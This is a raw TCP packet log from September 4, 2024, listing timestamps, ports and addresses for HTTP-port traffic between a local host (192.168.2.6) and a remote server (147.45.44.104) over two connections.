Sep 4, 2024 17:37:07.728918076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728931904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728951931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729655981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729679108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729690075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729698896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729701042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729710102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729721069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729724884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729732990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729743958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729748964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729756117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729765892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729768038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729778051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729784966 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729788065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729800940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729805946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729811907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729824066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729829073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729834080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729845047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729847908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729860067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.729871988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729891062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.729912043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.730570078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730582952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730592012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730602980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730612993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730617046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.730624914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730639935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.730642080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730654001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730657101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.730665922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730675936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.730675936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730694056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730700970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.730709076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.730721951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.730746031 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.730982065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731025934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.731070042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731082916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731092930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731103897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731115103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731121063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731126070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.731153965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.731688976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731731892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.731740952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731754065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731779099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.731786013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731791973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.731821060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.731837988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731851101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731859922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731870890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.731882095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.731906891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732022047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732038975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732048035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732072115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732091904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732122898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732134104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732165098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732260942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732270956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732280016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732290030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732300997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732306004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732312918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732326031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732327938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732352018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732367039 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732712984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732726097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732736111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732747078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732758045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732758045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732770920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732781887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732783079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732793093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732794046 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732805967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732819080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732842922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732860088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732868910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732877970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732888937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732898951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732901096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732911110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732912064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732923985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732934952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732935905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.732956886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.732980013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.733079910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.733091116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.733102083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.733119965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.733140945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.733171940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.733182907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.733191967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.733215094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.733231068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.733253956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.733267069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.733294964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.733306885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.098228931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.098257065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.098267078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.098295927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.098313093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.098321915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.098325968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.098335981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.098346949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.098350048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.098371029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.098392010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.099227905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099278927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.099353075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099397898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.099489927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099500895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099529028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.099539995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.099817038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099828005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099836111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099859953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.099884033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.099947929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099958897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.099992037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.100086927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.100128889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.100213051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.100253105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.101947069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.101955891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.101964951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.101974964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.101985931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.101985931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.101996899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.101999998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102008104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102020025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102030993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102060080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102098942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102111101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102118015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102128029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102137089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102142096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102147102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102155924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102159977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102166891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102174997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102183104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102186918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102196932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102200985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102207899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102216005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102219105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102226973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102230072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102241039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102252960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102258921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102268934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102272987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102279902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102288008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102288961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102299929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102308035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102310896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102322102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102329969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102334023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102344990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102349043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102355003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102358103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102366924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102375984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102382898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102386951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102405071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102411985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102417946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102422953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102432966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102442980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102447987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102453947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102457047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102464914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102474928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102475882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102483988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102487087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102498055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102503061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102509022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102519035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102523088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102529049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102540016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102545023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102555990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102565050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102566957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102574110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102579117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102591038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102598906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102600098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102608919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102619886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102619886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102629900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102636099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102660894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102660894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102673054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102679968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102683067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102691889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102703094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102709055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102711916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102731943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102741957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102849007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102860928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102869034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.102891922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.102910995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103519917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103529930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103564024 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103660107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103672028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103679895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103689909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103698969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103705883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103708982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103718042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103719950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103732109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103733063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103744984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103754997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103756905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103776932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103791952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103796005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103807926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103816032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103827000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.103830099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103840113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.103858948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104007006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104017973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104026079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104034901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104054928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104063034 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104083061 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104612112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104624033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104633093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104641914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104652882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104654074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104665041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104667902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104692936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104705095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104732037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104743004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104770899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104901075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104911089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104918957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104929924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104938984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104945898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104949951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104954004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104962111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104971886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104979038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.104983091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.104999065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105020046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105031967 CEST	80	49717	147.45.44.104	192.168.2.6
